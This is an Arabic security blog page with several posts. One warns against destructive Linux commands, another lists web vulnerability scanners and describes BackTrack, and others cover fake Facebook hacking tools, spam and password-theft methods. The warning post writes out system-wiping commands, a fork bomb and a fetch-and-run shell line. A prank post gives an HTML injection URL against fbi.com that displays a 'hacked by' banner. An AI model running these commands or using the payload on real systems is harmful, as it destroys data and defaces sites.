إظهار الرسائل ذات التسميات الهكرز الاخلافي. إظهار كافة الرسائل
إظهار الرسائل ذات التسميات الهكرز الاخلافي. إظهار كافة الرسائل
الاكواد التي لا يجب التفكير في استعمالها على انظمة اللينكس
السلام عليكم و رحمة الله تعالى و بركاته
اخواني متابعي مدونة فريق التطوير مرحباابكم في درس جديد و درسنا لهذا اليوم مستهدف لاصحاب انطمة اللينكس حيث اننا سنعرض أوامر "قاتلة" لا يجب عليك استعمالها فقد اصبح Linux نظاما سريع الانتشار و اصبح العديد من المستخدمين يتسارعون لتعلم كيفية التعامل معه و حيث ان مركز الاوامر (Terminal) الخاص بالنظام هو ابرز مميزاته فانه يلزم الحذر اثناء التعامل مع اوامره.في هذا موضوع سنتطرق الى خمسة اوامر وجب عدم تجربتها الا ان كنت مدركا لما تقوم به لانها ستعرض ملفاتك او نظام التشغيل بكامله للضرروهب كالتالي
rm -rf /
هذا الامر يقوم بحذف كل الملفات الممكنة سواء كانت على القرص الصلب او حتى على اي وحدة تخزين خارجية متصلة بالجهاز كما انه لن يظهر لك طلب تاكيد الامر.-----------------
:(){ :|: & };:
يسمى بـ Fork Bomb حيث انه عند تطبيق الامر يقوم بنسخ نفسه مرة اخرى ليصبح لديك اثنان , هذان الاثنان ينسخان نفسهما مرة اخرى وهكذا ..الى ان يستهلك موارد الجهاز و يتجمد النظام .---------------------------
mkfs.ext4 /dev/sda1
تتجلى مهمة هذا الامر في القيام بعملية Format للـ Partition الرئيسي من القرص الصلب .-------------------------------
mv ~ /dev/null
هذه ~ تمثل الـ Home folder و /dev/null في اوساط Unix هو بمثابة ثقب اسود و بالتالي فتنفيذ هذا الامر يقوم بارسال كل ملفات الـ home folder الى 'العدم' اي حذفها نهائيا. كما يمكن ان نعوض ~ باسم اي مجلد اخر و سيكون له نفس المصير.--------------------------------------------------------
wget http://some_untrusted_source -O- | sh
هذا الامر سيقوم بتحميل سكربت من المصدر الغير موثوق ويقوم بتشغيله الشيئ الذي غالبا ما يكون ضارا ,لذا يجب عدم تشغيل مثل هذا الامر من مصادر غير موثوقة.كانت هذه بعض الاوامر التي وجب التحذير من استخدامها عشوائيا و ان كنت من محبي التجربة فانصحك بتجربتها على نظام تشغيل وهمي.
أشهر 6 الادوات التي يستخدمها خبراء الحماية (الهكرز) في إختراق المواقع
بسم الله الرحمان الرحيم
اخواني متابعي مدونة فريق التطوير مرحباا بكم في درس جديد علو مدونتنا وهومتمحور حول الادوات التي يستعملها خبراء الحماية في الكشف عن الثغرات الموجودة في المواقع حيث اننا سنتطرق الى افضل 6 ادوات مشهور و هي كالتاليتطبيق Vega
تعد من اشهر ادوات إكتشاف الثغرات الامنية في المواقع والتي يستخدمها الهاكرز ، إذ انها قادرة على إكتشاف ثغرات امنية كـ (cross site scripting, file inclusion SQL injection, directory listing, shell injection,) . الاداة والمبنية على الجافا تتمع بواجهة رسومية تسهل الحياة على من يستعملها فيبقى على مستخدمها ان يقوم بتحديد فقط بعض الإعدادات حول كيف تتعامل الاداة مع الهدف ليتم بدأ عمل مسح شامل للموقع والكشف عن ثغراته الامنية .
رابط الاداة : subgraph.com/vega
-----------------
رابط الاداة : subgraph.com/vega
-----------------
تطبيق W3af
W3afيعد من أخطر الادوات ، فغير انها اداة مشهورة جدا بين خبراء الحماية والهاكرز فإنها قوية جدا ! . حيث ان الاداة قادرة على الكشف جميع انواع ثغرات (SQL injection) و ثغرات (Cross-Site Scripting) ، كما انها تأتي بواجهتين واجهة رسومية وواجهة تيرمينال .طبعا الواجهة الرسومية سهلة جدا ولن يجد من يستعملها اي مشاكل في التشغيل ، حيث يبقى كما هو الامر بالنسبة لاداة Vega القيام فقط بتحديد بعض الاختيارات تم الإنطلاق !
رابط الاداة : http://w3af.org/
--------------------
تطبيق SQLMap
SQLMapومن لايعرفه ! إسكيول ماب معروف بقوته وجبروته فيما يخص إكتشاف جميع انواع ثغرات الاسكيول إنجكشن فهو يعمل على أتمتة عملية البحث عن ثغرات الاسكيول في تطبيقات الويب ، كما ان الاداة تدعم معضم قواعد البيانات المشهورة والتي تعتمدها العديد من المواقع مثل (MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB) .
رابط الاداة : https://github.com/sqlmapproject/sqlmap
----------
تطبيق Wfuzz
آه ! Wfuzz هذا الاخير مختص في إختبار دالة ال (POST) و الـ (GET) من اجل الكشف عن بعض الثغرات في (SQL, XSS, LDAP) كما انه يمكنك إستخدامه في كشف ثغرات الالبروكسي ، نظام التحقق (Authentication ) و كذلك يمكن إستخدامه في عمل كوكيز فوزينغ cookies fuzzing .للإشارة في إن تطبيق Wfuzz لايتوفر على واجهة رسومية لهذا فإن تشغيله سيكون عن طريق كتابة مجموعة من الاوامر في التيرمينال .رابط الاداة : http://code.google.com/p/wfuzz
---------
تطبيق Grendel-Scan
اداة ستجد لها العديد من الشروحات في الويب ، فهي تقوم باتمتة عملية الكشف عن الثغرات الامنية في المواقع ، حيث يمكنها الكشف عن معضم الثغرات المعروفة ، كما انها تدعم جميع أنظمة التشغيل كويندوز لينكس وماكرابط الاداة:http://sourceforge.net/projects/grendel
----------
تطبيق Arachni
اداة Arachni هي اداة تقوم بالكشف عن معضم ثغرات الويب في الموقع الهدف ، من اهمها ثغرات (Local File inclusion) و ثغرات (remote file inclusion) المعروفة بخطورتها . الاداة تعمل فقط على الماك و لينكس كما انها عبارة عن فيرموورك متكامل يمكن تحميله من الرابط اسفله .
رابط الاداة: http://www.arachni-scanner.com
رابط الاداة: http://www.arachni-scanner.com
كانت هذه اهم الادوات المستعملة من طرف خبراء الحماية و الهكرز في حماية المواقع او اختراقها .
ما هو نظام الباك تراك
ما هو الباكتراك؟ What is backTrack?
الباكتراك : هو إصدار من إصدارات اللينوكس مفتوحة المصدر ,, يمكن تشغيلها من خلال الهارديسك ، أو من خلال دي في دي ، أو من خلال فلاش ميموري(USB)، وتهدف هذه الإصدارة بشكل خاص لاختبار الأمان من الاختراقات، وتحتوي عالكثير من الأدوات الخاصة، وتم بناء هذه الإصدارة استناداً على نظام اليوبنتو الشهير.
تاريخ الباك تراك BackTrack History
نشأت هذه الإصدارة من خلال اندماج اصدارين من إصدارات اللينوكس السابقة المتنافسة فيما بينها والتي كانت ترتكز على اختبار الاختراق.
slax وهي طريقة الإقلاع وتشغيل نظام التشغيل من خلال Live CD بمعنى ضع السي دي وقم باعادة التشغيل سيتم تشغيل النظام من خلاله. وقد قام بتطوير هذا النظام Mati Aharoni وهو مستشار بالأمن الإسرائيلي.
ويمكن استخدام فلاش ميموري بدلاً من السي دي أو الدي في دي.
وقد ساهم في هذا التطوير Max Moser حيث شملت التوزيعة أكثر من 300 أداة مرتبة بترتيب هرمي.
وما زال التطوير مستمر من عدة مطورين.
أدوات الباكتراك BackTrack Tools
تقدم توزيعة الباكتراك العديد من الأدوات وتمكن المستخدم من سهولة الوصول إليها ابتداءاً من البحث عن المنافذ كسر كلمات المرور والحصول عليها "الحصول على كلمات المرور الأصلية". وكما ذكرنا أدوات لتشغيل النظام من خلال دي في دي أو فلاش ميموري مع أمكانية تثبيت النظام على الهارد ديسك الخاص بجهاز الكمبيوتر.
ومن ضمن هذه الأدوات:
Metasploit integration
RFMON Injection capable wireless drivers
Kismet
Nmap
Ophcrack
Ettercap
Wireshark (formerly known as Ethereal)
BeEF (Browser Exploitation Framework)
Hydra
Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password.
Quypt (Terminal Emulator) (which is private software by Crimson Hacking group, which has leaked to the Mainstream) Blackhat
A large collection of exploits as well as more commonplace software such as browsers.
BackTrack arranges tools into 11 categories:
Information Gathering
Network Mapping
Vulnerability Identification
Web Application Analysis
Radio Network Analysis (802.11, Bluetooth, RFID)
Penetration (Exploit & Social Engineering Toolkit)
Privilege Escalation
Maintaining Access
Digital Forensics
Reverse Engineering
Voice Over IPاصدارات الباكتراك BackTrack Releases
BackTrack v.1.0 Beta February 5
, 2006 The BackTrack project released its first non-beta version (1.0) May 26, BackTrack 2 final released. March 6, 2007 BackTrack 3 final released. June 19, 2008 BackTrack 4 final release. (Now based on Debian) January 9
, 2010 BackTrack 4 R1 release May 8, 2010
BackTrack 4 R2 release November 22,
2010 BackTrack 5 release May 10, 2011
المصدر عالم الحواسيب
الباكتراك : هو إصدار من إصدارات اللينوكس مفتوحة المصدر ,, يمكن تشغيلها من خلال الهارديسك ، أو من خلال دي في دي ، أو من خلال فلاش ميموري(USB)، وتهدف هذه الإصدارة بشكل خاص لاختبار الأمان من الاختراقات، وتحتوي عالكثير من الأدوات الخاصة، وتم بناء هذه الإصدارة استناداً على نظام اليوبنتو الشهير.
نشأت هذه الإصدارة من خلال اندماج اصدارين من إصدارات اللينوكس السابقة المتنافسة فيما بينها والتي كانت ترتكز على اختبار الاختراق.
slax وهي طريقة الإقلاع وتشغيل نظام التشغيل من خلال Live CD بمعنى ضع السي دي وقم باعادة التشغيل سيتم تشغيل النظام من خلاله. وقد قام بتطوير هذا النظام Mati Aharoni وهو مستشار بالأمن الإسرائيلي.
ويمكن استخدام فلاش ميموري بدلاً من السي دي أو الدي في دي.
وقد ساهم في هذا التطوير Max Moser حيث شملت التوزيعة أكثر من 300 أداة مرتبة بترتيب هرمي.
وما زال التطوير مستمر من عدة مطورين.
أدوات الباكتراك BackTrack Tools
تقدم توزيعة الباكتراك العديد من الأدوات وتمكن المستخدم من سهولة الوصول إليها ابتداءاً من البحث عن المنافذ كسر كلمات المرور والحصول عليها "الحصول على كلمات المرور الأصلية". وكما ذكرنا أدوات لتشغيل النظام من خلال دي في دي أو فلاش ميموري مع أمكانية تثبيت النظام على الهارد ديسك الخاص بجهاز الكمبيوتر.
ومن ضمن هذه الأدوات:
Metasploit integration
RFMON Injection capable wireless drivers
Kismet
Nmap
Ophcrack
Ettercap
Wireshark (formerly known as Ethereal)
BeEF (Browser Exploitation Framework)
Hydra
Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password.
Quypt (Terminal Emulator) (which is private software by Crimson Hacking group, which has leaked to the Mainstream) Blackhat
A large collection of exploits as well as more commonplace software such as browsers.
BackTrack arranges tools into 11 categories:
Information Gathering
Network Mapping
Vulnerability Identification
Web Application Analysis
Radio Network Analysis (802.11, Bluetooth, RFID)
Penetration (Exploit & Social Engineering Toolkit)
Privilege Escalation
Maintaining Access
Digital Forensics
Reverse Engineering
Voice Over IPاصدارات الباكتراك BackTrack Releases
BackTrack v.1.0 Beta February 5
, 2006 The BackTrack project released its first non-beta version (1.0) May 26, BackTrack 2 final released. March 6, 2007 BackTrack 3 final released. June 19, 2008 BackTrack 4 final release. (Now based on Debian) January 9
, 2010 BackTrack 4 R1 release May 8, 2010
BackTrack 4 R2 release November 22,
2010 BackTrack 5 release May 10, 2011
المصدر عالم الحواسيب
برنامج اختراق حسابات الفايسبوك سارع !
السلام عليكم
كثيرهم من يطرحون أسئلة عن برامج لاختراق حسابات البريد الكتروني أو حساب على الفايسبوك مما يجعلهم يتجهون صوب محركات البحث الشهيرة ومحاولة ايجاد ما يشفي غليلهم . الشيئ الذي يؤدي بهم الى الدخول الى منتديات القرصنة و الهاكر فيجدون مقالات على هذا الشكل "أفضل برنامج لاختراق حساب الفايسبوك مجرب و مضمون 100 % ما عليك سوى وضع البريدالالكتروني و سيظهر لك الباسوورد بعد ثوان ".

هل حقا أنتم أغبياء لهذه الدرجة لتصدقوا هاته التراهات و الخزعبلات ؟؟؟؟
ربما الآن ستلاحظون تناقضا و اضحا في العنوان و مضمون التدوينة و لقد قمت بوضع عنوان هذه التدوينة على هذا الشكل قصدا و لأني أعرف جيدا أن الأشخاص الذين يتهافتون على مثل هاته المواضيع كثر لذلك قررت نشر هاته التدوينة لتعم الفائدة أكثر.
و المشكلة أن فكرة برنامج لاختراق حسابات الفايسبوك منتشرة بكثرة و خاصة لدى المبتدئين اذ تكشف الإحصائيات ان نسبة تحميل هاته البرامج في ارتفاع كبير مما يؤدي الى تزايد عدد الضحايا . وهذا إن دل على شيئ فإنما يدل على الجهل .
وتعد هاته البرامج في حقيقتها مجرد برامج وهمية يستخدمها المخترقون لاصطياد عدد كبير من الضحايا حيث يقومون بتلغيمها أي زرع فيروسات فيها بعدة سيرفرات ثم نشرها في العديد من المنتديات و المواقع و عند تحميلها و تشغيلها على جهازك سيتم اختراقك لا محالة من ذلك . وبالتالي ستنقلب عليك المعادلة رأسا على عقب بيحث ستصبح الضحية بدل المخترق .
ولتعلم جيدا أن اختراق حسابات الفايسبوك و البريد الالكتروني ليس بالأمر الهين والسهل عكس ما يبدو عليه بل يعتمد على قاعدة "ذكاء المخترق و غباء الضحية"
المصدر مدونة سوس
mou@d
كثيرهم من يطرحون أسئلة عن برامج لاختراق حسابات البريد الكتروني أو حساب على الفايسبوك مما يجعلهم يتجهون صوب محركات البحث الشهيرة ومحاولة ايجاد ما يشفي غليلهم . الشيئ الذي يؤدي بهم الى الدخول الى منتديات القرصنة و الهاكر فيجدون مقالات على هذا الشكل "أفضل برنامج لاختراق حساب الفايسبوك مجرب و مضمون 100 % ما عليك سوى وضع البريدالالكتروني و سيظهر لك الباسوورد بعد ثوان ".

هل حقا أنتم أغبياء لهذه الدرجة لتصدقوا هاته التراهات و الخزعبلات ؟؟؟؟
ربما الآن ستلاحظون تناقضا و اضحا في العنوان و مضمون التدوينة و لقد قمت بوضع عنوان هذه التدوينة على هذا الشكل قصدا و لأني أعرف جيدا أن الأشخاص الذين يتهافتون على مثل هاته المواضيع كثر لذلك قررت نشر هاته التدوينة لتعم الفائدة أكثر.
و المشكلة أن فكرة برنامج لاختراق حسابات الفايسبوك منتشرة بكثرة و خاصة لدى المبتدئين اذ تكشف الإحصائيات ان نسبة تحميل هاته البرامج في ارتفاع كبير مما يؤدي الى تزايد عدد الضحايا . وهذا إن دل على شيئ فإنما يدل على الجهل .
وتعد هاته البرامج في حقيقتها مجرد برامج وهمية يستخدمها المخترقون لاصطياد عدد كبير من الضحايا حيث يقومون بتلغيمها أي زرع فيروسات فيها بعدة سيرفرات ثم نشرها في العديد من المنتديات و المواقع و عند تحميلها و تشغيلها على جهازك سيتم اختراقك لا محالة من ذلك . وبالتالي ستنقلب عليك المعادلة رأسا على عقب بيحث ستصبح الضحية بدل المخترق .
ولتعلم جيدا أن اختراق حسابات الفايسبوك و البريد الالكتروني ليس بالأمر الهين والسهل عكس ما يبدو عليه بل يعتمد على قاعدة "ذكاء المخترق و غباء الضحية"
المصدر مدونة سوس
mou@d
احياء الذكرى الخمسين لانطلاق سلسلة دكتور هو اطول مسلسل في العالم
في الذكرى الخمسين لانطلاقها وعلى مدى ثلاثة أيام، تحتفل سلسلة الخيال العلمي البريطانية المعروفة باسم دكتور هو بالمناسبة شرقي لندن، حيث استقبلت آلاف المعجبين وممثلين من مختلف الحقب التي صورت فيها السلسلة.
“هو عرض يمكن لطفل يبلغ من العمر خمس سنوات أن يشاهده كما يمكن لمن هو في السبعين من العمر أيضا أن يشاهده، وهو ما يزال يشكل حدثا آنيا رغم تقدمك في السن وأعتقد أنه عرض مناسب للعائلة وكل عائلة يمكن أن تستمتع به على مستويات عدة”.
وتحكي السلسلة مغامرات كائن فضائي ذو ملامح بشرية يسافر عبر الزمن. وشرع في بث السلسلة في مثل هذا اليوم من عام ثلاثة وستين، غداة اغتيال الرئيس الامريكي الأسبق جون فتزجيرالد كينيدي، على قناة بي بي سي حتى سنة تسعة وثمانين، قبل أن تستأنف عام ألفين وخمسة.
وعلى هامش الاحتفال بالذكرى الخمسين تبث حلقات مختارة من السلسلة في أربع وتسعين بلدا، بما فيها ألف وخمسمائة قاعة سينما.
كيف تتم سرقتك في الفيسبوك
السلام عليكم
علينا الانتباه من الثغرات التي يمكن تؤدي الى سرقة حسابنا في موقع فيسبوك وهي :
معرفة من زار حسابك الشخصي
من المستحيل أن تعرف من قام بزيارة حسابك الشخصي على فيسبوك، نظراً لأن إدارة الموقع تمنع هذا الأمر بتاتاً، لذلك في المرة المقبلة التي ترى فيها خبر يتحدث عن طريقة معرفة عدد زوار حسابك الشخصي، فاعلم على الفور أنك تتعامل مع تطبيق مزيف يستهدف بياناتك الشخصية، الأمر الوحيد المتاح من خلال التطبيقات هو معرفة من قام بحذفك من قائمة أصدقائه..
1) الهدايا الوهمية
أسهل الطرق للاستيلاء على حسابات الأعضاء، كل ما سيحدث هو أنك ستستقبل هدية مجانية من شخص ما عبارة عن مجموعة من البطاقات إذا ضغطت على أي واحدة منها ستقوم على الفور بنقل بياناتك الشخصية عبر الشبكة العنكبوتية، بما في ذلك رقم الهاتف والحساب البنكي وعنوانك، وأي معلومة أخرى قد تقوم بكتابتها على حسابك الشخصي.
mou@d
تعرف على السبام Spam
في هذه التدوينة سوف نتكلم عن السبام او بالغة الانكليزية Spam واعتقد ان الكثير منا قد سمع عن السبام وقد اصابه الفضول ليعلم ما هوة
والان سوف نقوم بشرح السبام لك
تعريف السبام:
هوة ارسال رسائل الكترونية او بث او ترويج لمنتج عن طريق الخدمات رسائل أو محتويات غير مطلوبة وغير ملتمسة, بختصار ان السبام يقوم بارسال مليارات الرسائل عبر البريد الالكتروني الى اناس لا ترغب بلاطلاع على هذه الرسائل وقد لا تكون مشتركة بها
هوة ارسال رسائل الكترونية او بث او ترويج لمنتج عن طريق الخدمات رسائل أو محتويات غير مطلوبة وغير ملتمسة, بختصار ان السبام يقوم بارسال مليارات الرسائل عبر البريد الالكتروني الى اناس لا ترغب بلاطلاع على هذه الرسائل وقد لا تكون مشتركة بها
ماذا يشمل السبام:
- ارسال الرسائل التالهة
- ا لاستخدام غير المسموح لقوائم الأشخاص دون موافقتهم المسبقة لمثل هذه لمراسلات
- إعلانات تجارية للأشخاص أو المجموعات الإخبارية بالبريد الإلكتروني
- تهديد المستخدمين بأية طريقة
- استهداف وإرسال رسائل غير لائقة أو إرسال بالبريد الإلكتروني
- ارسال الرسائل التالهة
- ا لاستخدام غير المسموح لقوائم الأشخاص دون موافقتهم المسبقة لمثل هذه لمراسلات
- إعلانات تجارية للأشخاص أو المجموعات الإخبارية بالبريد الإلكتروني
- تهديد المستخدمين بأية طريقة
- استهداف وإرسال رسائل غير لائقة أو إرسال بالبريد الإلكتروني
ماذا حصل بعد تصور السبام:
وقد تطورت السبام من كونها مجرد وسيلة لإرسال رسائل مالية مزيفة، إلى كونها عمليات أكثر تطوراً تشمل سرقة الهوية الإلكترونية, حيث يتم اختراق التفاصيل الشخصية للمستخدمين واستخدامها في الاحتيال.
ويشكل السبام على شبكة الانترنت حوالي نصف البريد الالكتروني المتبادل عالميا. ففي تقرير حديث للأمم المتحدة قدرت خسائره المالية بـ 17,5 مليار يورو من حيث تديره لمصادر معلوماتية هائلة ولوقت كبير للغاية.
واتخذت الجهات الحكومية في الدول المختلفة والشركات والاتحادات الاقتصادية اجراءات لمقاومة ومحاربة هذه الظاهرة التي تفاقمت، واصبحت تؤرق مضاجع المختصين والمهتمين بقطاع الصناعة المعلوماتية.
وقد شرعت الكثير من القوانين للحماية منها ومن اخرها إقفال الموقع الذي قام بعملية السبام او الموقع المستفيد من السبام وقد يصل إلى إقفال السيرفر وتغريم الموقع.
وقد تطورت السبام من كونها مجرد وسيلة لإرسال رسائل مالية مزيفة، إلى كونها عمليات أكثر تطوراً تشمل سرقة الهوية الإلكترونية, حيث يتم اختراق التفاصيل الشخصية للمستخدمين واستخدامها في الاحتيال.
ويشكل السبام على شبكة الانترنت حوالي نصف البريد الالكتروني المتبادل عالميا. ففي تقرير حديث للأمم المتحدة قدرت خسائره المالية بـ 17,5 مليار يورو من حيث تديره لمصادر معلوماتية هائلة ولوقت كبير للغاية.
واتخذت الجهات الحكومية في الدول المختلفة والشركات والاتحادات الاقتصادية اجراءات لمقاومة ومحاربة هذه الظاهرة التي تفاقمت، واصبحت تؤرق مضاجع المختصين والمهتمين بقطاع الصناعة المعلوماتية.
وقد شرعت الكثير من القوانين للحماية منها ومن اخرها إقفال الموقع الذي قام بعملية السبام او الموقع المستفيد من السبام وقد يصل إلى إقفال السيرفر وتغريم الموقع.
mou@d
اعلام عام
السلام عليكم
اخواني ومتابعينا تعن مدونتنا الى أنه سيتم تحويل نطاق المدونة من www.tek-magic.blogspot.com ال www.th3explo.blogspot.com
انشاء الله
اخواني ومتابعينا تعن مدونتنا الى أنه سيتم تحويل نطاق المدونة من www.tek-magic.blogspot.com ال www.th3explo.blogspot.com
انشاء الله
يقول القراصنة ان "المنازل الذكية" سهلة الاختراق
اختراق مراحيض "ذكية" في اليابان تساوي $6,000 و السيطرة عليها هي خدعة متقنة او حيلة مدبرة ولاكنها ليست من النوع الامن فهي مسألة مهمة معظم الناس الذين يمتلكونها عليهم القلق ولاكن ماذا عن اختراق قفل الباب مع كشف الحركة او وجود كاميرات سرية !
تمكن البلوتوث من السيطرة علي مرحايض"Satis" الذكية هذا فقط جهاز واحد من العديد من الاجهزة التي استطاعت اختراق السرية .
ذا بلاك هات وديف كون عقدوا مؤتمر في لاس فيجاس هذا الاسبوع وقد علموا بكيفية اختراق الابواب المغلقة بلقفل,منافذ الطاقة المختطفة، وتولى المراكز التي تنسق جميع أجهزة التشغيل الآلي للمنزل، و القدرة علي فعل اشياء مرعبة و غريبة في المنزل.
حتي انة هنالك فرن تمكن من السيطرة علية من خلال Android app.
هذة الاجهزة متوفرة حاليا و سوف تجعل المنازل الذكية حقيقة المستقبل, ولاكن يحذر الباحثون الامن من هذة الاجهزة فهي لا توخذ علي محمل الجد من قبل الشركات المصنعة او المشتريين .
mou@d
كيف توهم اصدقاءك انك اخترقت موقعFBI
السلام عليكم
اضن انك عندما قرأة العنوان ضننة ان دلك بإستعمال برامج مثل BACKTRAC 5r3
لاكن الامر في غاية البساط كل ما عليك
هو تغيير السكريبت بما يناسبه
لاكن الامر في غاية البساط كل ما عليك
هو تغيير السكريبت بما يناسبه
http://www.fbi.com/?not_found=<marquee><h1>hacked+By+mouad%20mido+midoxx+tek-
magic.blogspot.com/</h1></marquee>
ولاتنسى ان تغير ما بلون الاحمر بما تناسب
تعرف على مكان تواجد أي شخص بالتدقيق إنطلاقا من الأي بي ip
السلام عليكم ورحمة الله وبركاته
عبر الأنترنت وجدت موقع Geotool ، الذي هو الآخر يعطيك معلومات وتفاصيل عن الأي بي ، بداية من شركة الإتصال التي هو مشترك فيها ، والبلد الذي يقطن فيه مع التوقيت المحلي...إلخ ، لكن الخطير في الموقع أنه يعطيك خريطة لمكان تواجدك بالتدقيق ، وهو ما تفاجئت له بعد أن قمت بالتجربة على نفسي حيث حدد المنطقة والشارع بالتدقيق.
رابط الموقع هنا
mou@d
تعرف على ستة طرق يستطيع الهاكر من خلالها سرقة باسورد حسابك
السلام عليكم
متابعي مدونة سحر التقنية قد تتفاجئ بان باسورد حسابك قد تغير فجأة لتكتشف بعد ذلك
انه قد تم سرقة باسورد حسابك ، لكن المشكلة هي الا تعرف كيف قام بذلك او ماهي
الطريقة التي وضفها من اجل سرقت باسورد الحساب حتى تتفادى وقوع ذلك في
المستقبل . وهذا هو هدف هذه التدوينة وهي إعطائك اغلب الطرق التي يوضفها الهاكرز
من اجل سرقة باسورد الحساب سواء كان ذلك متعلقا بحسابك على موقع التواصل
الإجتماعي او في منتديات او على بعض المواقع التي تستعملها .
الصفحات المزورة Phishing
من الطرق الاكثر إنتشارا هي سرقة الباسوردات عن طريق الصفحات المزورة او Phishing فماهو الفيشينغ ؟ الــ Phishing هي عبارة عن صفحات مزورة تكون شبيهة بصفحات المواقع الرسمية (المواقع التي تزورها ) هذه الصفحات تكون في إستضافات (مساحات ) يمتلكها الهاكر وعندما تدخل على تلك الصفحة المزورة وتدخل الباسورد فإن الباسورد سيرسل إلى الهاكر وهكذا سيحصل هذا الاخير على باسوردك . وطريقة إقناعك بالدخول على الصفحة المزورة قد تخلف من هاكر إلى هاكر فهناك البعض سيراسلونك بإيميل على علبة الواردات منتحلين شخصية الموقع المسجل به يطلبون منك تغير باسورد حسابك وبعد ان تنقر على الرابط يتم توجيهك إلى الصفحة المزورة عوض ان تتوجه إلى صفحة الموقع الحقيقي لهذا إنتبه دائما إلى عنوان الموقع وتأكد من انه حقيقي قبل وضع الباسورد في اي صفحة .
الشم Sniffing
وهذه الطريقة يتبعها الهاكر في حالة كنت معه في نفس الشبكة مثلا كنت متصلا بالانترنت من خلال مقهى انترنت بإستعمال حاسوبك او في العمل او المدرسة حيث ان الجميع مرتبط بنفس الشبكة فيقوم الهاكر بإستعمال بعض البرامج او الادوات من اجل سرقة اي باسورد تدخله في الموقع حيث ان الباسورد يصبح يمر من حاسوبه قبل ان يمر إلى سرفر الموقع وهكذا يستطيع قرائته من دون مشاكل ولحماية نفسك قم دائما بتجول المواقع بإستعمال بروتوكول https مثلا لاتتصفح الفيسبوك إلا بعد ادخال https://facebook.com عوض http://facebook.com : والذي سيفيدك حقا في حماية نفسك من الهاكرز عندما تتواجد في شبكة محلية .
الهندسة الإجتماعية
قد يستعمل الهاكر اسلوب الهندسة الاجتماعية من اجل معرفة الباسورد فهو يحاول ان يجمع كافة المعلومات عنك من اجل التعرف على الباسوردات الممكنة بل كذلك من اجل سرقة الحساب عن طريق الإجابة على السؤال السري للحساب لهذا حاول دائما ان تكون الباسوردات التي تختارها لحساباتك ليست لها علاقة مع حياتك الخاصة او العملية كذلك بالنسبة لـإختيارك لسؤال الامان في حسابك فلا تختار إجابة صحية للسؤال مثلا لو إخترت السؤال في اي سنة ولدت جدتك ؟ إختر الجواب ان يكون "ساعة يدوية " هكذا لن يستطيع الهاكر إختراق حسابك إنطلاقا من تقديم جواب صحيح للسؤال . في حالة طلب منه لان الإجابة التي إخترتها انت لحساب ليست لها علاقة مع الجواب الحقيقي .
إختراق قواعد بيانات لمواقع
قد يقوم الهاكرز بإختراق قواعد بيانات لبعض المواقع الشهيرة والتي تحتوي على الاف البيانات قد يكون منها إيميل وباسورد تسجيل الدخول الذي تستعمله لهذا قد يستعملوا تلك البيانات في تجربة الدخول على حساباتك الاخرى في الانترنت لهذا لاتجعل ابدا الباسورد الذي تسجل به الدخول في المواقع و المنتديات هو نفسه الذي تستخدم في تسجيل الدخول إلى إيميلك .
التخمين brute forcing
في حالة إذا كنت لاتغير الباسورد من وقت لاخر قد تكون ضحية تخمين الباسورد وهي عملية يستند فيها الهاكر إلى برامج وكذلك إلى اجهزة تقوم بعملية تخمين باسورد حسابك عبر تجربة الاف الإحتماليات في الثانية الواحدة ، لهذا قبم بتغير الباسورد من وقت لاخر .
إستعمال برامج ضارة
ومن الطرق المعروفة وهي إستخدام تروجانات وبرامج ضارة في سرقة الحساب ، حيث ان الهاكر قد يرسل إليك تروجان وهو عبارة عن برنامج يمكن الهاكر من الدخول إلى الحاسوب والتجسس عليه ، تم لتجسس على كافة الباسوردات التي تدخلها إلى حاسوبك وهكذا يستطيع إختراقك ، لهذا لاتدخل إلى اي رابط انت غير متأكد منه ولاتحمل اي شيئ من على الانترنت إلا بعد التأكد من مصدره .كانت هذه بعض الطرق التي من خلالها قد يقوم الهاكر بسرقة باسوردات حسابك إذا كانت لذيك اي طرق اخرى فلاتنسى مشاركتنا إياها في تعلق .
mou@d
أعلن هنا


.jpg)
